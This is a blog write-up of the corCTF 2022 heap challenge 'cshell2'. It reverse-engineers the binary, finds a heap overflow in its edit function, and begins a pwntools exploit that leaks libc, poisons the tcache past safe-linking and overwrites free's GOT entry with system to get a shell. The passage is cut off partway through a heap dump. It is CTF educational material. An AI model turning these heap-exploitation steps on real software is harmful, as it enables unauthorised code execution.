<!DOCTYPE html>


<html theme="dark" showBanner="true" hasBanner="true" > 
<link href="/fontawesome/css/fontawesome.css" rel="stylesheet">
<link href="/fontawesome/css/brands.css" rel="stylesheet">
<link href="/fontawesome/css/solid.css" rel="stylesheet">
<script src="/js/color.global.min.js" ></script>
<script src="/js/load-settings.js" ></script>
<head>
  <meta charset="utf-8">
  
  
  <title>[corCTF 2022 - pwn] cshell2 | repr</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="Introductioncshell2 is a heap challenge I did during the corCTF 2022 event. It was pretty classic so I will not describe a lot.If you begin with heap challenges, I advice you to read previous heap wri">
<meta property="og:type" content="article">
<meta property="og:title" content="[corCTF 2022 - pwn] cshell2">
<meta property="og:url" content="https://n4sm.github.io/posts/cshell2/index.html">
<meta property="og:site_name" content="repr">
<meta property="og:description" content="Introductioncshell2 is a heap challenge I did during the corCTF 2022 event. It was pretty classic so I will not describe a lot.If you begin with heap challenges, I advice you to read previous heap wri">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2022-08-06T22:00:00.000Z">
<meta property="article:modified_time" content="2023-09-05T09:45:11.051Z">
<meta property="article:author" content="nasm">
<meta property="article:tag" content="ctf">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="nasm">
<meta property="article:tag" content="2022">
<meta property="article:tag" content="heap">
<meta property="article:tag" content="corCTF">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="repr" type="application/atom+xml">
  
  
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-192.png" sizes="192x192">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-192.png" sizes="192x192">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 7.0.0"></head>

<body>
  
  
    
<div id="banner" class="">
  <img src="/pic/wall.png" itemprop="image">
  <div id="banner-dim"></div>
</div>
 
   
  <div id="main-grid" class="shadow   ">
    <div id="nav" class=""  >
      <navbar id="navbar">
  <nav id="title-nav">
    <a href="/">
      <div id="vivia-logo">
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
      </div>
      <div>repr </div>
    </a>
  </nav>
  <nav id="main-nav">
    
      <a class="main-nav-link" href="/">Home</a>
    
      <a class="main-nav-link" href="/archives">Archives</a>
    
      <a class="main-nav-link" href="/about">About</a>
    
  </nav>
  <nav id="sub-nav">
    <a id="theme-btn" class="nav-icon">
      <span class="material-symbols-rounded light-mode-icon">wb_sunny</span>
      <span class="material-symbols-rounded dark-mode-icon">dark_mode</span>
    </a>
    
      <a id="nav-rss-link" class="nav-icon mobile-hide" href="/atom.xml" title="RSS Feed">
        <span class="material-symbols-rounded rss">rss_feed</span>
      </a>
    
    <a id="nav-search-btn" class="nav-icon" title="Search" style="display: none;">
      <span class="material-symbols-rounded">search</span>
    </a>
    <div id="nav-menu-btn" class="nav-icon">
      <span class="material-symbols-rounded">menu</span>
    </div>
  </nav>
</navbar>
<div id="nav-dropdown" class="hidden">
  <div id="dropdown-link-list">
    
      <a class="nav-dropdown-link" href="/">Home</a>
    
      <a class="nav-dropdown-link" href="/archives">Archives</a>
    
      <a class="nav-dropdown-link" href="/about">About</a>
    
    
      <a class="nav-dropdown-link" href="/atom.xml" title="RSS Feed">RSS</a>
     
    </div>
</div>
<script>
  let dropdownBtn = document.getElementById("nav-menu-btn");
  let dropdownEle = document.getElementById("nav-dropdown");
  dropdownBtn.onclick = function() {
    dropdownEle.classList.toggle("hidden");
  }
</script>
    </div>
    <div id="sidebar-wrapper">
      <sidebar id="sidebar">
  
    <div class="widget-wrap">
  <div class="info-card">
    <div class="avatar">
      
        <image src=https://cdn.discordapp.com/attachments/755522926819934349/1135933820852502589/chtholly_nota_seniorious_by_asukaln_dfhx63b-414w-2x.jpg></image>
      
      <div class="img-dim"></div>
    </div>
    <div class="info">
      <div class="username">nasm </div>
      <div class="dot"></div>
      <div class="subtitle">pwn / kernel stuff </div>
      <div class="link-list">
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://twitter.com/nasm_re" title="Twitter"><i class="fa-brands fa-twitter"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://github.com/n4sm" title="GitHub"><i class="fa-brands fa-github"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://ret2school.github.io/discord" title="Discord"><i class="fa-brands fa-discord"></i></a>
         
      </div>  
    </div>
  </div>
</div>

  
  <div class="sticky">
    
      


  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Categories</h3>
      <div class="category-box"></div>
    </div>
  </div>


    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Recent Posts</h3>
      <ul>
        
          <a class="recent-link" href="/posts/hello-world/" title="Hello World" >
            <div class="recent-link-text">
              Hello World
            </div>
          </a>
        
          <a class="recent-link" href="/posts/iwindow/" title="[ImaginaryCTF 2023 - pwn] window-of-opportunity" >
            <div class="recent-link-text">
              [ImaginaryCTF 2023 - pwn] window-of-opportunity
            </div>
          </a>
        
      </ul>
    </div>
  </div>

    
  </div>
</sidebar>
    </div>
    <div id="content-body">
       

<article id="post-cshell2" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  
    
   
  <div class="article-inner">
    <div class="article-main">
      <header class="article-header">
        
<div class="main-title-bar">
  <div class="main-title-dot"></div>
  
    
      <h1 class="p-name article-title" itemprop="headline name">
        [corCTF 2022 - pwn] cshell2
      </h1>
    
  
</div>

        <div class='meta-info-bar'>
          <div class="meta-info">
  <time class="dt-published" datetime="2022-08-06T22:00:00.000Z" itemprop="datePublished">2022-08-06</time>
</div>
          <div class="need-seperator meta-info">
            <div class="meta-cate-flex">
  
  <a class="meta-cate-link" href="/categories/pwn/">pwn</a>
   
</div>
  
          </div>
          <div class="wordcount need-seperator meta-info">
            2.7k words 
          </div>
        </div>
        
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/2022/" rel="tag">2022</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/corCTF/" rel="tag">corCTF</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ctf/" rel="tag">ctf</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/heap/" rel="tag">heap</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/nasm/" rel="tag">nasm</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/pwn/" rel="tag">pwn</a></li></ul>

      </header>
      <div class="e-content article-entry" itemprop="articleBody">
        
          <h2 id="Introduction"><a href="#Introduction" class="headerlink" title="Introduction"></a>Introduction</h2><p><code>cshell2</code> is a heap challenge I did during the <a target="_blank" rel="noopener" href="https://ctftime.org/event/1656">corCTF 2022</a> event. It was pretty classic so I will not describe a lot.<br>If you begin with heap challenges, I advice you to read <a target="_blank" rel="noopener" href="https://ret2school.github.io/tags/heap/">previous heap writeup</a>.</p>
<h2 id="TL-DR"><a href="#TL-DR" class="headerlink" title="TL; DR"></a>TL; DR</h2><ul>
<li>Fill tcache.</li>
<li>Heap overflow in <code>edit</code> on the <code>bio</code> field which allows to leak the address of the unsortedbin.</li>
<li>Leak heap and defeat safe-linking to get an arbitrary write through tcache poisoning.</li>
<li>Hiijack GOT entry of <code>free</code> to <code>system</code>.</li>
<li>Call <code>free(&quot;/bin/sh&quot;)</code>.</li>
<li>PROFIT</li>
</ul>
<h2 id="Reverse-Engineering"><a href="#Reverse-Engineering" class="headerlink" title="Reverse Engineering"></a>Reverse Engineering</h2><p>Let’s take a look at the provided binary and libc:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">$ ./libc.so.6 </span><br><span class="line">GNU C Library (GNU libc) development release version 2.36.9000.</span><br><span class="line">Copyright (C) 2022 Free Software Foundation, Inc.</span><br><span class="line">This is free software; see the source for copying conditions.</span><br><span class="line">There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A</span><br><span class="line">PARTICULAR PURPOSE.</span><br><span class="line">Compiled by GNU CC version 12.1.0.</span><br><span class="line">libc ABIs: UNIQUE IFUNC ABSOLUTE</span><br><span class="line">Minimum supported kernel: 3.2.0</span><br><span class="line">For bug reporting instructions, please see:</span><br><span class="line">&lt;https://www.gnu.org/software/libc/bugs.html&gt;.</span><br><span class="line">$ checksec --file cshell2</span><br><span class="line">[*] &#x27;/home/nasm/Documents/pwn/corCTF/cshell2/cshell2&#x27;</span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">    RELRO:    Partial RELRO</span><br><span class="line">    Stack:    Canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      No PIE (0x3fb000)</span><br><span class="line">    RUNPATH:  b&#x27;.&#x27;</span><br></pre></td></tr></table></figure>

<p>A very recent libc plus a non PIE-based binary without <code>FULL RELRO</code>. Thus we could think to some GOT hiijacking stuff directly on the binary. Let’s take a look at the <code>add</code> function:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">unsigned</span> __int64 <span class="title function_">add</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int</span> idx_1; <span class="comment">// ebx</span></span><br><span class="line">  <span class="type">unsigned</span> __int8 idx; <span class="comment">// [rsp+Fh] [rbp-21h] BYREF</span></span><br><span class="line">  <span class="type">size_t</span> size; <span class="comment">// [rsp+10h] [rbp-20h] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v4; <span class="comment">// [rsp+18h] [rbp-18h]</span></span><br><span class="line"></span><br><span class="line">  v4 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Enter index: &quot;</span>);</span><br><span class="line">  __isoc99_scanf(<span class="string">&quot;%hhu&quot;</span>, &amp;idx);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Enter size (1032 minimum): &quot;</span>);</span><br><span class="line">  __isoc99_scanf(<span class="string">&quot;%lu&quot;</span>, &amp;size);</span><br><span class="line">  <span class="keyword">if</span> ( idx &gt; <span class="number">0xE</span>u || size &lt;= <span class="number">0x407</span> || size_array[<span class="number">2</span> * idx] )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Error with either index or size...&quot;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    idx_1 = idx;</span><br><span class="line">    chunk_array[<span class="number">2</span> * idx_1] = (<span class="type">chunk_t</span> *)<span class="built_in">malloc</span>(size);</span><br><span class="line">    size_array[<span class="number">2</span> * idx] = size;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Successfuly added!&quot;</span>);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Input firstname: &quot;</span>);</span><br><span class="line">    read(<span class="number">0</span>, chunk_array[<span class="number">2</span> * idx], <span class="number">8uLL</span>);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Input middlename: &quot;</span>);</span><br><span class="line">    read(<span class="number">0</span>, chunk_array[<span class="number">2</span> * idx]-&gt;midName, <span class="number">8uLL</span>);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Input lastname: &quot;</span>);</span><br><span class="line">    read(<span class="number">0</span>, chunk_array[<span class="number">2</span> * idx]-&gt;lastName, <span class="number">8uLL</span>);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Input age: &quot;</span>);</span><br><span class="line">    __isoc99_scanf(<span class="string">&quot;%lu&quot;</span>, &amp;chunk_array[<span class="number">2</span> * idx]-&gt;age);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Input bio: &quot;</span>);</span><br><span class="line">    read(<span class="number">0</span>, chunk_array[<span class="number">2</span> * idx]-&gt;bio, <span class="number">0x100</span>uLL);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> v4 - __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>It creates a chunk by asking several fields but nothing actually interesting there. Let’s take a look at the <code>show</code> function:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">unsigned</span> __int64 <span class="title function_">show</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">unsigned</span> __int8 v1; <span class="comment">// [rsp+7h] [rbp-9h] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v2; <span class="comment">// [rsp+8h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v2 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Enter index: &quot;</span>);</span><br><span class="line">  __isoc99_scanf(<span class="string">&quot;%hhu&quot;</span>, &amp;v1);</span><br><span class="line">  <span class="keyword">if</span> ( v1 &lt;= <span class="number">0xE</span>u &amp;&amp; size_array[<span class="number">2</span> * v1] )</span><br><span class="line">    <span class="built_in">printf</span>(</span><br><span class="line">      <span class="string">&quot;Name\n last: %s first: %s middle: %s age: %d\nbio: %s&quot;</span>,</span><br><span class="line">      chunk_array[<span class="number">2</span> * v1]-&gt;lastName,</span><br><span class="line">      chunk_array[<span class="number">2</span> * v1]-&gt;firstName,</span><br><span class="line">      chunk_array[<span class="number">2</span> * v1]-&gt;midName,</span><br><span class="line">      chunk_array[<span class="number">2</span> * v1]-&gt;age,</span><br><span class="line">      chunk_array[<span class="number">2</span> * v1]-&gt;bio);</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Invalid index&quot;</span>);</span><br><span class="line">  <span class="keyword">return</span> v2 - __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>It prints a chunk only if it’s allocated (size entry initialized in the size array) and if the index is right.<br>Then the <code>delete</code> function:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">unsigned</span> __int64 <span class="title function_">delete</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">unsigned</span> __int8 v1; <span class="comment">// [rsp+7h] [rbp-9h] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v2; <span class="comment">// [rsp+8h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v2 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;Enter index: &quot;</span>);</span><br><span class="line">  __isoc99_scanf(<span class="string">&quot;%hhu&quot;</span>, &amp;v1);</span><br><span class="line">  <span class="keyword">if</span> ( v1 &lt;= <span class="number">0xE</span>u &amp;&amp; size_array[<span class="number">2</span> * v1] )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">free</span>(chunk_array[<span class="number">2</span> * v1]);</span><br><span class="line">    size_array[<span class="number">2</span> * v1] = <span class="number">0LL</span>;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Successfully Deleted!&quot;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Either index error or trying to delete something you shouldn&#x27;t be...&quot;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> v2 - __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>Quite common <code>delete</code> handler, it prevents double free.<br>The vulnerability is in the <code>edit</code> function:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">unsigned</span> __int64 <span class="title function_">edit</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">unsigned</span> __int8 idx; <span class="comment">// [rsp+7h] [rbp-9h] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v2; <span class="comment">// [rsp+8h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v2 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;Enter index: &quot;</span>);</span><br><span class="line">  __isoc99_scanf(<span class="string">&quot;%hhu&quot;</span>, &amp;idx);</span><br><span class="line">  <span class="keyword">if</span> ( idx &lt;= <span class="number">0xE</span>u &amp;&amp; size_array[<span class="number">2</span> * idx] )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Input firstname: &quot;</span>);</span><br><span class="line">    read(<span class="number">0</span>, chunk_array[<span class="number">2</span> * idx], <span class="number">8uLL</span>);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Input middlename: &quot;</span>);</span><br><span class="line">    read(<span class="number">0</span>, chunk_array[<span class="number">2</span> * idx]-&gt;midName, <span class="number">8uLL</span>);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Input lastname: &quot;</span>);</span><br><span class="line">    read(<span class="number">0</span>, chunk_array[<span class="number">2</span> * idx]-&gt;lastName, <span class="number">8uLL</span>);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Input age: &quot;</span>);</span><br><span class="line">    __isoc99_scanf(<span class="string">&quot;%lu&quot;</span>, &amp;chunk_array[<span class="number">2</span> * idx]-&gt;age);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Input bio: (max %d)\n&quot;</span>, size_array[<span class="number">2</span> * idx] - <span class="number">32LL</span>);</span><br><span class="line">    read(<span class="number">0</span>, chunk_array[<span class="number">2</span> * idx]-&gt;bio, size_array[<span class="number">2</span> * idx] - <span class="number">32LL</span>);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Successfully edit&#x27;d!&quot;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> v2 - __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>It reads <code>size_array[2 * idx] - 32LL</code> bytes into a <code>0x100</code>-sized buffer which leads to a heap overflow.</p>
<h2 id="Exploitation"><a href="#Exploitation" class="headerlink" title="Exploitation"></a>Exploitation</h2><p>There is no actual issue, we can allocate whatever chunk bigger than <code>0x407</code>, the only fancy thing we have to do would be to defeat safe-linking to get an arbitrary write with a tcache poisoning attack on the <code>0x410</code> tcache bin. Here is the attack I led against the challenge but that’s not the most optimized.</p>
<p>The plan is to:</p>
<ul>
<li>Allocate two <code>0x408</code>-sized chunks : pivot and victim, in order to easily get later libc leak.</li>
<li>Allocate 9 more chunks and then fill the <code>0x410</code> tcachebin with them (with only 7 of them).</li>
<li>Delete <code>victim</code> and overflow pivot up to the next free pointer of <code>victim</code> to get a libc leak.</li>
<li>Allocate a <code>0x408</code>-sized chunk to get the <code>8</code>-th chunk (within <code>chunk_array</code>) which is on the top of the bin.</li>
<li>Leak the heap same way as for libc, but we have to defeat safe-linking.</li>
<li>Delete the <code>9</code>-th chunk to put it in the tcachebin at the first position.</li>
<li>Then we can simply <code>edit</code> chunk <code>8</code> and overflow over chunk <code>9</code> to poison its next <code>fp</code> to hiijack it toward the GOT entry of <code>free</code>.</li>
<li>Pop chunk <code>9</code> from the freelist and then request another the target memory area : the GOT entry of <code>free</code>.</li>
<li>Write <code>system</code> into the GOT entry of <code>free</code>.</li>
<li>Free whatever chunk for which <code>//bin/sh</code> is written at the right begin.</li>
<li>PROFIT.</li>
</ul>
<p>To understand the attack process I’ll show the heap state at certain part of the attack.</p>
<h2 id="Libc-heap-leak"><a href="#Libc-heap-leak" class="headerlink" title="Libc &#x2F; heap leak"></a>Libc &#x2F; heap leak</h2><p>First we have to fill the tcache. We allocate a chunk right after <code>chunk0</code> we do not put into the tcache to be able to put it in the unsortedbin to make appear unsortedbin’s address:</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="number">0</span>, <span class="number">1032</span>, <span class="string">b&quot;//bin/sh\x00&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="number">1337</span>, <span class="string">b&quot;&quot;</span>) <span class="comment"># pivot</span></span><br><span class="line">add(<span class="number">1</span>, <span class="number">1032</span>, <span class="string">b&quot;&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="number">1337</span>, <span class="string">b&quot;&quot;</span>) <span class="comment"># victim</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">2</span>, <span class="number">7</span>+<span class="number">2</span> + <span class="number">2</span>):</span><br><span class="line">    add(i, <span class="number">1032</span>, <span class="string">b&quot;&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="number">1337</span>, <span class="string">b&quot;&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">2</span>, <span class="number">7</span>+<span class="number">2</span>):</span><br><span class="line">    delete(i)</span><br><span class="line"></span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">edit(<span class="number">0</span>, <span class="string">b&quot;&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="number">1337</span>, <span class="string">b&quot;Y&quot;</span>*(<span class="number">1032</span> - <span class="number">64</span> + <span class="number">7</span>))</span><br><span class="line"></span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">io.recvuntil(<span class="string">b&quot;Y&quot;</span>*(<span class="number">1032</span> - <span class="number">64</span> + <span class="number">7</span>) + <span class="string">b&quot;\n&quot;</span>)</span><br><span class="line">libc.address = pwn.u64(io.recvuntil(<span class="string">b&quot;1 Add\n&quot;</span>)[:-<span class="number">6</span>].ljust(<span class="number">8</span>, <span class="string">b&quot;\x00&quot;</span>)) - <span class="number">0x1c7cc0</span></span><br><span class="line">pwn.log.info(<span class="string">f&quot;libc: <span class="subst">&#123;<span class="built_in">hex</span>(libc.address)&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># Heap state:</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">0x1de1290	0x0000000000000000	0x0000000000000411	................ [chunk0]</span></span><br><span class="line"><span class="string">0x1de12a0	0x68732f6e69622f0a	0x0000000000000a0a	./bin/sh........</span></span><br><span class="line"><span class="string">0x1de12b0	0x000000000000000a	0x0000000000000539	........9.......</span></span><br><span class="line"><span class="string">0x1de12c0	0x0000000000000000	0x0000000000000000	................</span></span><br><span class="line"><span class="string">0x1de12d0	0x0000000000000000	0x0000000000000000	................</span></span><br><span class="line"><span class="string">0x1de12e0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de12f0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1300	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1310	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1320	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1330	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1340	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1350	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1360	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1370	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1380	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de1390	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de13a0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY</span></span><br><span class="line"><span class="string">0x1de13b0	0x5959595959595959	0x5959595959595959	